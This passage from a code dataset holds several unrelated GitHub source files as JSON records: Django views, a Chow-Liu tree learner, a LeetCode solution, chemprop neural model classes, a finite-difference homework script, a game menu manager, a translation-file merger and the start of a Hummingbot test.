messages.error(request, 'Unable to Update Team Details')\n return redirect('team_list')\n except:\n return redirect('team_list')\n else:\n context = {'team': team}\n return render(request, 'page/team/update.html', context)\n\n@login_required\ndef delete_team(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(Team, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('team_list')\n\n\treturn render (request, 'page/team/delete.html', context)\n\n@login_required\ndef clients_list(request):\n clients = Clients.objects.all()\n context = {'clients': clients}\n return 
render(request, 'page/clients/list.html', context)\n\n@login_required\ndef create_clients(request):\n if request.method == 'POST':\n form = ClientsForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Client Added Successfully')\n return redirect('clients_list')\n else:\n messages.error(request, 'Failed to Add Client')\n return redirect('clients_list')\n except:\n return redirect('clients_list')\n else:\n return render(request, 'page/clients/create.html')\n\n@login_required\ndef clients_detail(request, name):\n client = Clients.objects.get(clientname=name)\n context = {'client': client}\n return render(request, 'page/clients/details.html', context)\n\n@login_required\ndef update_clients(request, name):\n client = Clients.objects.get(clientname=name)\n if request.method == 'POST':\n form = ClientsForm(request.POST or None, request.FILES, instance = client)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Client Details Updated Successfully')\n return redirect('clients_list')\n else:\n messages.error(request, 'Failed to Update Client Details')\n return redirect('clients_list')\n except:\n return redirect('clients_list')\n else:\n context = {'client' : client}\n return render(request, 'page/clients/update.html', context)\n\n@login_required\ndef delete_clients(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(Clients, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('clients_list')\n\n\treturn render (request, 'page/clients/delete.html', context)\n\n\n@login_required\ndef contact_list(request):\n contact = Contact.objects.all()\n context = {'contact':contact}\n return render(request, 'page/contact/list.html', context)\n\n@login_required\ndef create_contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Contact Details Created')\n return redirect('contact_list')\n else:\n messages.error(request, 'Unable to create contactform')\n return redirect('contact_list')\n except:\n return redirect('contact_list')\n else:\n return render(request, 'page/contact/create.html')\n\n@login_required\ndef contact_details(request):\n # contact = Contact.objects.get(title=name)\n contact = Contact.objects.all().first()\n context = {'contact': contact}\n return render(request, 'page/contact/details.html', context)\n\n@login_required\ndef update_contact(request):\n # contact = Contact.objects.get(title=name)\n contact = Contact.objects.all().first()\n if request.method == 'POST':\n form = ContactForm(request.POST or None, request.FILES, instance = contact)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Contact Details Updated')\n return redirect('contact_details')\n else:\n messages.error(request, 'Unable to update contactform')\n return redirect('contact_details')\n except:\n return redirect('contact_details ')\n else:\n context = {'contact':contact}\n return render(request, 'page/contact/update.html', context)\n\n\n\nclass ContactMessageList(ListView):\n model = ContactMessage\n template_name = 'page/contactmessage/list.html'\n context_object_name = 'message'\n\n\nclass ContactMessageDetail(DetailView):\n model = ContactMessage\n form_class = ContactMessageForm\n template_name = 'page/contactmessage/detail.html'\n context_object_name = 'messages'\n\nclass ContactMessageCreate(CreateView):\n \n def get(self, request, *args, **kwargs):\n form = 
ContactMessageForm()\n return render(request, 'page/contactmessage/create.html', {'form':form})\n\n def post(self, request, *args, **kwargs): \n if request.method == 'POST':\n firstname = request.POST.get('firstname', '')\n lastname = request.POST.get('lastname', '')\n email = request.POST.get('email', '')\n phone = request.POST.get('phone', '')\n message = request.POST.get('message', '') \n form = ContactMessageForm(firstname=firstname, lastname=lastname, emailaddress=email, phone=phone, message=message)\n form.save()\n \n context = {'firstname': firstname, 'lastname': lastname, 'email': email, 'phone':phone, 'message':message}\n\n \n send_mail_all(context, email)\n return render(request, 'page/contactmessage/create.html', context)\n\n\nclass ContactMessageDelete(DeleteView):\n model = ContactMessage\n success_url = reverse_lazy('contact_message')\n template_name = 'page/contactmessage/delete.html'","repo_name":"arjunkhattri/EliteBackend","sub_path":"constructionapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21343945671","text":"import networkx as nx\n\n\ndef learn_CL(cell_data):\n node_ids = cell_data.keys()\n G = nx.Graph()\n\n for i in range(len(node_ids)):\n G.add_node(node_ids[i])\n for j in range(i+1,len(node_ids)):\n G.add_edge(node_ids[i], node_ids[j], weight=calc_MI(cell_data[node_ids[i]],cell_data[node_ids[j]]))\n \n T = nx.minimum_spanning_tree(G)\n return T\n\n\ndef learn_CL_from_distance(d_files, tree_path):\n G = nx.Graph()\n\n for file in d_files:\n infile=open(file)\n for line in infile:\n tmp=line.strip().split(',')\n G.add_edge(tmp[0],tmp[1], weight=float(tmp[2]))\n infile.close()\n\n T = nx.minimum_spanning_tree(G)\n nx.write_gml(T, tree_path)\n \n \n","repo_name":"shahcompbio/mondrianbackup","sub_path":"mondrian/workflows/ltm/scripts/learn_CL_from_distance.py","file_name":"learn_CL_from_distance.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18058818009","text":"class Solution:\n def findDuplicates(self, nums: List[int]) -> List[int]:\n #create result arrlist\n result = []\n\n #iterate through input\n for i in nums:\n if nums[abs(i) - 1] < 0:\n result.append(abs(i))\n else:\n nums[abs(i) - 1] *= -1\n\n return result\n\n\n\"\"\"\n suboptimal: use a set to determine if there are duplicates\n O(n) space, O(n) time\n \n sorting and two pointer: O(1) space, O(n log(n)) time\n \n [-4,-3,-2,-7,8,2,-3,-1]\n \n curr_num = 2\n position = \n curr_idx = 2\n [2]\n \n if the number that we're indexing into is already a negative int, \n then append the current element that we're curently at in array's iteration to the result array\n \n Pseudocode:\n create an arrlist that will house the output\n use the current element as the index to turn that number into a negative int (don't forget to - 1 to account for indexing)\n \n iterate through the input arrlist\n if the number that we're indexing into has already been turned into a negative, then we know there's a duplicate, so add it to the result arrlist\n \n return the resutl arrlist\n\n\"\"\"\n","repo_name":"hjungj21o/Interview-DS-A","sub_path":"lc_442_find_all_duplicates_in_arr.py","file_name":"lc_442_find_all_duplicates_in_arr.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} 
+{"seq_id":"23171281460","text":"from argparse import Namespace\nimport logging\nfrom typing import Optional\n\nfrom sklearn.gaussian_process import GaussianProcessClassifier, GaussianProcessRegressor\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom .mpn import MPN\nfrom chemprop.nn_utils import get_activation_function, initialize_weights\n\nimport schnetpack as spk\nfrom schnetpack import AtomsData\nfrom schnetpack.datasets import QM9\n\nclass EvaluationDropout(nn.Dropout):\n def __init__(self, *args, **kwargs):\n super(EvaluationDropout, self).__init__(*args, **kwargs)\n self.inference_mode = False\n\n def set_inference_mode(self, val : bool):\n self.inference_mode = val\n\n def forward(self, input):\n if self.inference_mode:\n return nn.functional.dropout(input, p = 0)\n else:\n return nn.functional.dropout(input, p = self.p)\n\n\nclass MoleculeModel(nn.Module):\n \"\"\"A MoleculeModel is a model which contains a message passing network following by feed-forward layers.\"\"\"\n\n def __init__(self, classification: bool, confidence: bool = False,\n conf_type: Optional[str] = None):\n \"\"\"\n Initializes the MoleculeModel.\n\n :param classification: Whether the model is a classification model.\n :param confidence: Whether confidence values should be predicted.\n :param conf_type: Str definition of what type of confidence to use\n \"\"\"\n super(MoleculeModel, self).__init__()\n\n self.classification = classification\n # NOTE: Confidence flag is only set if the model must handle returning\n # confidence internally and for evidential learning.\n self.confidence = confidence\n self.conf_type = conf_type\n\n if self.classification:\n if self.conf_type == 'evidence':\n self.final_activation = nn.Identity()\n else:\n self.final_activation = nn.Sigmoid()\n\n self.use_last_hidden = True\n\n def create_encoder(self, args: Namespace):\n \"\"\"\n Creates the message passing encoder for the model.\n\n :param args: Arguments.\n \"\"\"\n self.encoder = MPN(args)\n self.args = args\n\n def create_ffn(self, args: Namespace):\n \"\"\"\n Creates the feed-forward network for the model.\n\n :param args: Arguments.\n \"\"\"\n first_linear_dim = args.hidden_size\n if args.use_input_features:\n first_linear_dim += args.features_dim\n\n # When using dropout for confidence, use dropouts for evaluation in addition to training.\n if args.confidence == 'dropout':\n self.dropout = EvaluationDropout(args.dropout)\n else:\n self.dropout = nn.Dropout(args.dropout)\n\n activation = get_activation_function(args.activation)\n\n output_size = args.output_size\n\n if self.confidence: # if confidence should be learned\n if args.confidence == 'evidence':\n if self.classification: # dirichlet\n # For each task, output both the positive and negative\n # evidence for that task\n output_size *= 2\n else: # normal inverse gamma\n # For each task, output the parameters of the NIG\n # distribution (gamma, lambda, alpha, beta)\n output_size *= 4\n else: # gaussian MVE\n # For each task output the paramters of the Normal\n # distribution (mu, var)\n output_size *= 2\n\n # Create FFN layers\n if args.ffn_num_layers == 1:\n ffn = [\n self.dropout,\n nn.Linear(first_linear_dim, output_size)\n ]\n else:\n ffn = [\n self.dropout,\n nn.Linear(first_linear_dim, args.ffn_hidden_size)\n ]\n for _ in range(args.ffn_num_layers - 3):\n ffn.extend([\n activation,\n self.dropout,\n nn.Linear(args.ffn_hidden_size, args.ffn_hidden_size),\n ])\n\n ffn.extend([\n activation,\n self.dropout,\n nn.Linear(args.ffn_hidden_size, 
args.last_hidden_size),\n            ])\n\n            ffn.extend([\n                activation,\n                self.dropout,\n                nn.Linear(args.last_hidden_size, output_size),\n            ])\n\n        # Create FFN model\n        self.ffn = nn.Sequential(*ffn)\n\n    def forward(self, *input):\n        \"\"\"\n        Runs the MoleculeModel on input.\n\n        :param input: Input.\n        :return: The output of the MoleculeModel.\n        \"\"\"\n        ffn = self.ffn if self.use_last_hidden else nn.Sequential(\n            *list(self.ffn.children())[:-1])\n        output = ffn(self.encoder(*input))\n\n        if self.confidence:\n            if self.conf_type == \"evidence\":\n                if self.classification:\n                    # Convert the outputs into the parameters of a Dirichlet\n                    # distribution (alpha).\n                    output = nn.functional.softplus(output) + 1\n\n                else:\n                    min_val = 1e-6\n\n                    # Split the outputs into the four distribution parameters\n                    means, loglambdas, logalphas, logbetas = torch.split(output, output.shape[1]//4, dim=1)\n                    lambdas = torch.nn.Softplus()(loglambdas) + min_val\n                    alphas = torch.nn.Softplus()(logalphas) + min_val + 1 # add 1 for numerical constraints of Gamma function\n                    betas = torch.nn.Softplus()(logbetas) + min_val\n\n                    # Return these parameters as the output of the model\n                    output = torch.stack((means, lambdas, alphas, betas),\n                                         dim = 2).view(output.size())\n            else:\n                even_indices = torch.tensor(range(0, list(output.size())[1], 2))\n                odd_indices = torch.tensor(range(1, list(output.size())[1], 2))\n\n                if self.args.cuda:\n                    even_indices = even_indices.cuda()\n                    odd_indices = odd_indices.cuda()\n\n                predicted_means = torch.index_select(output, 1, even_indices)\n                predicted_confidences = torch.index_select(output, 1, odd_indices)\n                capped_confidences = nn.functional.softplus(predicted_confidences)\n\n                output = torch.stack((predicted_means, capped_confidences), dim = 2).view(output.size())\n\n        # Don't apply sigmoid during training b/c using BCEWithLogitsLoss\n        if self.classification and not self.training and self.use_last_hidden:\n            output = self.final_activation(output)\n\n        return output\n\nclass AtomisticModel(nn.Module):\n\n    def __init__(self, confidence: bool = False,\n                 conf_type: Optional[str] = None):\n        \"\"\"Wrapper class that uses self.model internally but also emits extra evidence columns.\n\n        :param confidence: Whether confidence values should be predicted.\n        :param conf_type: Str definition of what type of confidence to use\n        \"\"\"\n        super(AtomisticModel, self).__init__()\n\n        self.classification = False\n        self.confidence = confidence\n        self.conf_type = conf_type\n        self.representation = None\n        self.outputs = []\n        self.model = None\n\n    def create_representation(self, args: Namespace):\n        \"\"\"\n        Create representation layer\n\n        :param args: Namespace\n        \"\"\"\n        # Message passing for n_interaction layers\n        # n_atom_basis is the n_in\n        self.representation = spk.representation.SchNet(\n            n_atom_basis=args.n_atom_basis, n_filters=args.n_filters,\n            n_gaussians=args.n_gaussians, n_interactions=args.n_interactions,\n            cutoff=args.cutoff, cutoff_network=spk.nn.cutoff.CosineCutoff,\n        )\n        self.args = args\n\n    def create_output_layers(self, args: Namespace, train_dataset, scaler):\n        \"\"\"\n        train_dataset used for computing standardization\n\n        Means and stddevs used in standardization\n        atomrefs is also an elementwise residual that should be learned\n\n        :param args: Arguments\n        :param train_dataset: AtomisticDataset used for normalization values\n        :param scaler: Scaler used for normalization values\n        \"\"\"\n\n        # Use this for evidential 
parameters\n        output_size = args.output_size\n        if self.confidence: # if confidence should be learned\n            if args.confidence == 'evidence':\n                if self.classification: # dirichlet\n                    # For each task, output both the positive and negative\n                    # evidence for that task\n                    output_size *= 2\n                else: # normal inverse gamma\n                    # For each task, output the parameters of the NIG\n                    # distribution (gamma, lambda, alpha, beta)\n                    output_size *= 4\n            else: # gaussian MVE\n                # For each task output the parameters of the Normal\n                # distribution (mu, var)\n                output_size *= 2\n\n        # Build an output predictor network\n        # Hardcode QM9.U0, do not feed in atomrefs since these are accounted\n        # for when the dataset is loaded\n        self.output_U0 = spk.atomistic.Atomwise(n_in=args.n_atom_basis,\n                                                n_out=1, property=QM9.U0)\n\n        self.outputs.append(self.output_U0)\n        # Outputs for all non-mean predictions (that don't need to be normalized)\n        self.has_aux = False\n        if output_size > 1:\n            self.aux_outputs = spk.atomistic.Atomwise(n_in=args.n_atom_basis,\n                                                      n_out=output_size - 1,\n                                                      property=\"bayesian_outputs\")\n            self.outputs.append(self.aux_outputs)\n            self.has_aux = True\n        self.args = args\n\n    def create_joint_output(self, args: Namespace):\n        \"\"\"\n        Create the full model from the representation and output modules.\n\n        :param args: Namespace\n        \"\"\"\n        # Model output\n        # OUTPUT is n_out (int) – output dimension of target property (default: 1)\n        self.model = spk.AtomisticModel(representation=self.representation,\n                                        output_modules=self.outputs)\n\n    def forward(self, batch, *inputs):\n        \"\"\" Forward pass \"\"\"\n        # Hardcode QM9.U0\n        # dictionary with energy_U0 as the key (\"property=QM9.U0\")\n\n        if self.args.cuda:\n            batch = {k: v.cuda() for k, v in batch.items()}\n\n        output = self.model(batch)\n        mean_outs = output[QM9.U0]\n        output_list = [mean_outs]\n        if self.has_aux:\n            aux_outs = output[\"bayesian_outputs\"]\n            output_list.append(aux_outs)\n\n        output = torch.cat(output_list, dim=1)\n\n        if self.confidence:\n            if self.conf_type == \"evidence\":\n                if self.classification:\n                    # Convert the outputs into the parameters of a Dirichlet\n                    # distribution (alpha).\n                    output = nn.functional.softplus(output) + 1\n\n                else:\n                    min_val = 1e-6\n\n                    # Split the outputs into the four distribution parameters\n                    means, loglambdas, logalphas, logbetas = torch.split(output,\n                                                                         output.shape[1]//4,\n                                                                         dim=1)\n                    lambdas = torch.nn.Softplus()(loglambdas) + min_val\n                    alphas = torch.nn.Softplus()(logalphas) + min_val + 1 # add 1 for numerical constraints of Gamma function\n                    betas = torch.nn.Softplus()(logbetas) + min_val\n\n                    # Return these parameters as the output of the model\n                    output = torch.stack((means, lambdas, alphas, betas),\n                                         dim = 2).view(output.size())\n            else:\n                even_indices = torch.tensor(range(0, list(output.size())[1], 2))\n                odd_indices = torch.tensor(range(1, list(output.size())[1], 2))\n\n                if self.args.cuda:\n                    even_indices = even_indices.cuda()\n                    odd_indices = odd_indices.cuda()\n\n                predicted_means = torch.index_select(output, 1, even_indices)\n                predicted_confidences = torch.index_select(output, 1, odd_indices)\n                capped_confidences = nn.functional.softplus(predicted_confidences)\n\n                output = torch.stack((predicted_means, capped_confidences), dim = 2).view(output.size())\n\n        return output\n\ndef build_model(args: Namespace, train_data=None, scaler=None) -> nn.Module:\n    \"\"\"\n    Builds a MoleculeModel, which is a message passing neural network + feed-forward layers.\n\n    :param args: Arguments.\n    :param train_data: Used for initialization of atomistic network\n    :param scaler: Used for initialization of atomistic 
network\n :return: A MoleculeModel containing the MPN encoder along with final linear layers with parameters initialized.\n \"\"\"\n output_size = args.num_tasks\n args.output_size = output_size\n\n if args.atomistic:\n if args.confidence == 'nn':\n model = AtomisticModel(confidence=True,\n conf_type=\"nn\")\n elif args.confidence == \"evidence\":\n model = AtomisticModel(confidence=True,\n conf_type=\"evidence\")\n else:\n model = AtomisticModel()\n\n # Build model\n model.create_output_layers(args, train_data, scaler=scaler)\n model.create_representation(args)\n model.create_joint_output(args)\n\n else:\n is_classifier = args.dataset_type == 'classification'\n if args.confidence == 'nn':\n model = MoleculeModel(classification=is_classifier, confidence=True,\n conf_type=\"nn\")\n elif args.confidence == \"evidence\":\n model = MoleculeModel(classification=is_classifier, confidence=True,\n conf_type=\"evidence\")\n else:\n model = MoleculeModel(classification=is_classifier)\n model.create_encoder(args)\n model.create_ffn(args)\n initialize_weights(model)\n\n return model\n","repo_name":"aamini/chemprop","sub_path":"chemprop/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14662,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"34"} +{"seq_id":"24453860014","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef approximate(f,eps):\n def closure(x):\n x = (f(x+eps)-f(x))/eps\n return x\n return closure\n\n\nif __name__ == \"__main__\":\n x = np.arange(4,8.1,.1)/20\n eps = [1*10**-1,1*10**-7,1*10**-15]\n # I would have made this a loop for each eps value if we didn't have to change the line type in our plot. Since we do, I chose to do the 3 types separately, since I believe a loop would have made it more complicated\n approx1 = approximate(np.log,eps[0])(x)\n approx2 = approximate(np.log,eps[1])(x)\n approx3 = approximate(np.log,eps[2])(x)\n \n actual = 1/x\n \n plt.plot(x,approx1,label='$ \\epsilon = 1$x$10^{-1} $')\n plt.plot(x,approx2,label='$ \\epsilon = 1$x$10^{-7} $')\n plt.plot(x,approx3,label='$ \\epsilon = 1$x$10^{-15} $')\n \n plt.plot(x,actual,label='analytical derivative',linestyle=':',color='black')\n plt.title(\"Compare $ f'_{FD}(x) $ at $\\epsilon$ values and actual $f'(x) $\")\n plt.xlabel('x')\n plt.ylabel(\" $f'(x) $\")\n plt.legend()\n plt.savefig('P3.png')\n \n wordsi = str(f\"epsilon = {1*10**-7} most closely approximates the true derivative. \\nFor values of epsilon that are too small, the line is not smooth due to precision errors. I think this is a result of rounding, and not using exact numbers. 
\\nFor values of epsilon that are too large, the approximation is not close enough to be very accurate.\")\n answeri = str('Answer to Q-i: \\n' + wordsi)\n print(answeri)\n wordsii = str(f\"By using the chain rule and breaking down the function into smaller derivatives that it can compute accurately, automatic differentiation is able to solve these problems without having to round results or make approximations.\")\n answerii = str('\\nAnswer to Q-ii: \\n' + wordsii)\n print(answerii)\n \n plt.show()\n \n","repo_name":"geoJackSheehan/CS107_jos4435","sub_path":"homework/hw4/submission/P3.py","file_name":"P3.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20612583089","text":"from engine.windowsManager import WindowsManager\nfrom engine.items.Person import Person\nfrom engine.windows.objects import Window\nfrom engine.menuManager import *\nfrom engine.windows.rows.objects import *\nfrom functools import partial \n\nclass GameManager():\n def __init__(self):\n self.windows_manager = WindowsManager()\n self.player = Person()\n self.main_menu()\n\n def quit_game(self):\n self.windows_manager.delete_all_windows()\n\n def main_menu(self):\n window = Window()\n\n main_menu = window.menu_manager.create_menu(\n menu_name=\"Главное меню\",\n menu_items=[\n MenuItem(view='Начать игру', event = partial(self.player_window, self.player)),\n MenuItem(view='Выход', event = self.quit_game),\n ]\n )\n\n window.rows_manager.add_rows([\n MenuRowItem(main_menu)\n ])\n\n self.windows_manager.create_window(window)\n\n # def inventory_window(self, player_object:Person):\n # inventory_window = Window()\n \n # player_object.inventory.\n\n # inventory_menu = inventory_window.menu_manager.create_menu(\n # menu_name = 'Меню инвентаря',\n # menu_items = \n # )\n\n def player_window(self, player_object:Person):\n window = Window()\n\n player_menu = window.menu_manager.create_menu(\n menu_name='player_menu',\n menu_items=[\n MenuItem(view='Инвентарь', ),\n ]\n )\n\n window_menu = window.menu_manager.create_menu(\n menu_name='window_menu',\n menu_items=[\n MenuItem(keyword='q', view='Назад/Выход', event=self.windows_manager.close_and_get_prev)\n ]\n )\n\n window.rows_manager.add_rows([\n TextRowItem(player_object.name),\n TextRowItemByHeader(\"Описание:\", player_object.description),\n PlayerStatsRow(player_object),\n PlayerWeaponsEquipRow(player_object),\n PlayerArmorEquipRow(player_object),\n MenuRowItem(player_menu),\n MenuRowItem(window_menu)\n ])\n\n self.windows_manager.create_window(window)\n","repo_name":"rolanAkhmad/console_game","sub_path":"engine/gameManager.py","file_name":"gameManager.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3995336698","text":"from xml.dom import minidom, Node\nimport os\nimport os.path\n\n#defines\nTS_FILEOUT = \"Settings_%s.ts\"\n\ndef mergeDuplicates(root, db):\n\tfor child in root.childNodes:\n\t\tif (child.nodeType == Node.ELEMENT_NODE) and (child.nodeName == \"message\"):\n\t\t\tlocation = \"\"\n\t\t\tsource = \"\"\n\t\t\ttranslation = \"\"\n\t\t\ttype = \"\"\n\t\t\tfor mChild in child.childNodes:\n\t\t\t\tmChildName = mChild.nodeName\n\t\t\t\tif mChildName == \"location\":\n\t\t\t\t\tlocation = mChild.getAttribute(\"filename\")\n\t\t\t\telif mChildName == \"source\":\n\t\t\t\t\tif mChild.hasChildNodes():\n\t\t\t\t\t\tassert mChild.firstChild.nodeType == 
Node.TEXT_NODE\n\t\t\t\t\t\tsource = mChild.firstChild.data\n\t\t\t\telif mChildName == \"translation\":\n\t\t\t\t\ttype = mChild.getAttribute(\"type\")\n\t\t\t\t\tif mChild.hasChildNodes():\n\t\t\t\t\t\tassert mChild.firstChild.nodeType == Node.TEXT_NODE\n\t\t\t\t\t\ttranslation = mChild.firstChild.data\n\n\t\t\tnewLocation = location\n\t\t\tnewType = type\n\t\t\tnewTranslation = translation\n\t\t\t# if a message entry already exists, try to merge the translation into the unfinished one;\n\t\t\t# the location should be taken from the unfinished one\n\t\t\toldLocation = \"\"\n\t\t\tif source in db:\n\t\t\t\toldType = db[source][\"type\"]\n\t\t\t\toldTranslation = db[source][\"translation\"]\n\t\t\t\toldLocation = db[source][\"location\"]\n\t\t\t\tif oldType == \"unfinished\":\n\t\t\t\t\tnewLocation = oldLocation\n\t\t\t\t\tnewType = oldType\n\t\t\t\telse:\n\t\t\t\t\tnewTranslation = oldTranslation\n\t\t\t\t\tnewType = \"\"\n\t\t\t\t#print \"merged newLocation %s \\n location1 = %s \" % (newLocation, source)\n\t\t\tdb[source] = { \"location\" : newLocation, \"source\" : source, \"translation\" : newTranslation, \"type\" : newType }\n\n\t\t\t#print \" location = %s \\nsource = %s \\n type = %s \" % (location, source, type)\n\ndef saveTS(doc, language, existingDb):\n\troot = doc.firstChild\n\twhiteList = [\"label\", \"title\", \"tooltip\"]\n\t# extract all the strings as a set of key:value pairs\n\t#removeDuplicates(root, \"btsettings\", existingDb, whiteList)\n\t# write a qt linguist ts file (don't bother creating an\n\t# xml doc for now, we'll just do it by hand)\n\t# see http://www.i18nguy.com/unicode/language-identifiers.html\n\theader = '''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE TS>\n<TS version=\"2.0\" language=\"%s\">\n<context>\n<name>BumpTopSettings</name>''' % language\n\tfooter = '''\n</context>\n</TS>'''\n\tglobal TS_FILEOUT\n\tworkingDir = os.getcwd()\n\ttsFilePath = os.path.join(workingDir, TS_FILEOUT % language)\n\ttsFile = open(tsFilePath, 'w+')\n\ttsFile.write(header)\n\tfor key, value in existingDb.items():\n\t\tlocation = value[\"location\"]\n\t\tsource = key\n\t\ttranslation = value[\"translation\"]\n\t\ttype = value[\"type\"]\n\t\ttypeString = \"\"\n\t\tif \"unfinished\" == type:\n\t\t\ttypeString = \"\"\" type=\"unfinished\" \"\"\"\n\t\tmessage = \"\"\"\n\t<message>\n\t\t<location filename=\"%s\"/>\n\t\t<source>%s</source>\n\t\t<translation%s>%s</translation>\n\t</message>\"\"\" % (location.encode(\"UTF-8\"), source.encode(\"UTF-8\"), typeString, translation.encode(\"UTF-8\"))\n\t\ttsFile.write(message)\n\ttsFile.write(footer)\n\ttsFile.close()\n\nif __name__ == \"__main__\":\n\tlanguages = [\n\t\t\"en\",\n\t\t\"zh_TW\",\n\t\t\"zh_CN\",\n\t\t\"ja\",\n\t\t\"ko\",\n\t\t\"fr\",\n\t\t\"it\",\n\t\t\"de\",\n\t\t\"ru\",\n\t\t\"es\",\n\t\t\"pt\",\n\t\t\"tr\",\n\t\t\"br\",\n\t\t\"nl\",\n\t]\n\tfor language in languages:\n\t\t# if possible, try and load the existing ts file\n\t\texistingDb = {}\n\t\ttsDoc = minidom.parse(TS_FILEOUT % language)\n\t\troot = tsDoc.getElementsByTagName(\"context\")[0]\n\t\tmergeDuplicates(root, existingDb)\n\t\tsaveTS(tsDoc, language, existingDb)\n","repo_name":"bumptop/BumpTop","sub_path":"trunk/win/BumpTop Settings/project/mergeDuplicateMessageTS.py","file_name":"mergeDuplicateMessageTS.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"34"}
+{"seq_id":"20754859844","text":"import asyncio\nimport unittest\nfrom contextlib import ExitStack\nfrom decimal import Decimal\nfrom pathlib import Path\nfrom test.hummingbot.connector.gateway.clob_spot.data_sources.injective.injective_mock_utils import InjectiveClientMock\nfrom 
test.mock.http_recorder import HttpPlayer\nfrom typing import Awaitable, List\nfrom unittest.mock import AsyncMock, patch\n\nfrom bidict import bidict\n\nfrom hummingbot.client.config.client_config_map import ClientConfigMap\nfrom hummingbot.client.config.config_helpers import ClientConfigAdapter\nfrom hummingbot.connector.exchange_base import ExchangeBase\nfrom hummingbot.connector.gateway.clob_spot.data_sources.injective.injective_api_data_source import (\n InjectiveAPIDataSource,\n)\nfrom hummingbot.connector.gateway.common_types import CancelOrderResult, PlaceOrderResult\nfrom hummingbot.connector.gateway.gateway_in_flight_order import GatewayInFlightOrder\nfrom hummingbot.connector.gateway.gateway_order_tracker import GatewayOrderTracker\nfrom hummingbot.connector.trading_rule import TradingRule\nfrom hummingbot.connector.utils import combine_to_hb_trading_pair\nfrom hummingbot.core.data_type.common import OrderType, TradeType\nfrom hummingbot.core.data_type.in_flight_order import OrderState, OrderUpdate, TradeUpdate\nfrom hummingbot.core.data_type.order_book_message import OrderBookMessage\nfrom hummingbot.core.data_type.trade_fee import (\n AddedToCostTradeFee,\n DeductedFromReturnsTradeFee,\n MakerTakerExchangeFeeRates,\n TokenAmount,\n)\nfrom hummingbot.core.event.event_logger import EventLogger\nfrom hummingbot.core.event.events import AccountEvent, BalanceUpdateEvent, MarketEvent, OrderBookDataSourceEvent\nfrom hummingbot.core.network_iterator import NetworkStatus\n\n\nclass MockExchange(ExchangeBase):\n pass\n\n\nclass InjectiveAPIDataSourceTest(unittest.TestCase):\n base: str\n quote: str\n trading_pair: str\n sub_account_id: str\n db_path: Path\n http_player: HttpPlayer\n patch_stack: ExitStack\n\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n cls.base = \"COIN\"\n cls.quote = \"ALPHA\"\n cls.trading_pair = combine_to_hb_trading_pair(base=cls.base, quote=cls.quote)\n cls.inj_trading_pair = combine_to_hb_trading_pair(base=\"INJ\", quote=cls.quote)\n cls.sub_account_id = \"0xc7287236f64484b476cfbec0fd21bc49d85f8850c8885665003928a122041e18\" # noqa: mock\n\n def setUp(self) -> None:\n super().setUp()\n self.initial_timestamp = 1669100347689\n self.injective_async_client_mock = InjectiveClientMock(\n initial_timestamp=self.initial_timestamp,\n sub_account_id=self.sub_account_id,\n base=self.base,\n quote=self.quote,\n )\n self.injective_async_client_mock.start()\n\n client_config_map = ClientConfigAdapter(hb_config=ClientConfigMap())\n\n self.connector = MockExchange(client_config_map=ClientConfigAdapter(ClientConfigMap()))\n self.tracker = GatewayOrderTracker(connector=self.connector)\n connector_spec = {\n \"chain\": \"injective\",\n \"network\": \"mainnet\",\n \"wallet_address\": self.sub_account_id\n }\n self.data_source = InjectiveAPIDataSource(\n trading_pairs=[self.trading_pair],\n connector_spec=connector_spec,\n client_config_map=client_config_map,\n )\n self.data_source.gateway_order_tracker = self.tracker\n\n self.trades_logger = EventLogger()\n self.order_updates_logger = EventLogger()\n self.trade_updates_logger = EventLogger()\n self.snapshots_logger = EventLogger()\n self.balance_logger = EventLogger()\n\n self.data_source.add_listener(event_tag=OrderBookDataSourceEvent.TRADE_EVENT, listener=self.trades_logger)\n self.data_source.add_listener(event_tag=MarketEvent.OrderUpdate, listener=self.order_updates_logger)\n self.data_source.add_listener(event_tag=MarketEvent.TradeUpdate, listener=self.trade_updates_logger)\n 
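# NOTE: EventLogger is a plain in-memory sink; each listener registered here simply appends emitted events to its event_log so the tests below can assert on them.\n        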
